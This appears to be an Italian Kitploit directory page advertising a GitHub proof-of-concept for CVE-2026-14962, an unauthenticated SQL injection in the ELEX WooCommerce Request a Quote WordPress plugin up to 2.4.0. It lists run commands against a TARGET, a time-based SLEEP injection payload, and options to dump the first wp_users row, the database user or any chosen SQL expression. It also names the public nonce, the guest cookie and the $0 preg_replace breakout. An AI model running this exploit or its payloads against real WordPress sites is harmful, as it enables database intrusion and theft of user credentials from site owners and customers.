Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-14962 — Wordpress Plugin ELEX WooCommerce Request a Quote SQL injection non autenticato | Kitploit
Strumenti/GitHubGitHub/cflowsec/cve-2026-14962
Scanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubcflowsec/cve-2026-14962

CVE-2026-14962

Wordpress Plugin ELEX WooCommerce Request a Quote SQL injection non autenticato

Vedi Repository
9h 56m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-14962

Plugin WordPress ELEX WooCommerce Request a Quote, SQL injection non autenticata

ELEX WooCommerce Request a Quote (plugin WordPress elex-request-a-quote) ≤ 2.4.0 — SQL injection non autenticata tramite l'azione AJAX pubblica elex_raq_add_to_quote.

Solo per test autorizzati. Non eseguire questo strumento contro sistemi di cui non si è proprietari o per cui non si ha il permesso di eseguire test.

Richiede: Python 3, solo libreria standard. Il target deve eseguire WooCommerce (gli script/nonce del preventivo sono stampati nella pagina shop/home).

root@kitploit:~
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u https://TARGET --test --insecure
python3 cve-2026-14962-elex-raq-sqli.py -u TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump --pid 11
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sleep 3
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sql 'OR JSON_ARRAY(SLEEP(3)))#'
FlagCosa fa
-u / --urlRadice del sito WordPress (obbligatorio). http:// o https://; un hostname viene provato prima come HTTPS, poi come HTTP. Il TLS self-signed viene ritentato automaticamente. --insecure salta la verifica fin dall'inizio
--testOspite: versione del plugin + nonce pubblico, poi una sonda SQL non distruttiva $0
--dumpPrima riga di wp_users + utente del DB. Richiede WP_DEBUG affinché l'errore XPATH sia nel corpo HTTP
--query SQLLa tua espressione SQL (senza apici singoli; usa l'esadecimale 0x… per le stringhe)
--sql EXPRdata[id] grezzo dopo il breakout $0$0 (scrivi tu il gadget ) OR … #)
--sleep NTentativo SLEEP(N) basato sul tempo
--pid / --vidID prodotto / variazione WooCommerce (la variazione deve essere non vuota per raggiungere il sink)
--insecureSalta la verifica TLS
--timeoutTimeout HTTP in secondi (predefinito 30)

Non autenticata. Il nonce è stampato in request_a_quote_ajax_obj su / e /shop/. Il cookie ospite è request_a_quote_user_coockie (la grafia del plugin).

--test invia in POST attribute_value=$0. La versione vulnerabile 2.4.0 di preg_replace tratta $0 come la corrispondenza di %s e lascia un %d letterale nella query. La 2.4.1 esegue il binding di JSON_CONTAINS e $0 è solo un valore JSON.

Stdout: VERSION, NONCE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, NO_NONCE, NO_DUMP, SQLERR, SLEEP.

CVE: CVE-2026-14962. Changelog del plugin 2.4.1.

Working PoC

Scarica lo strumento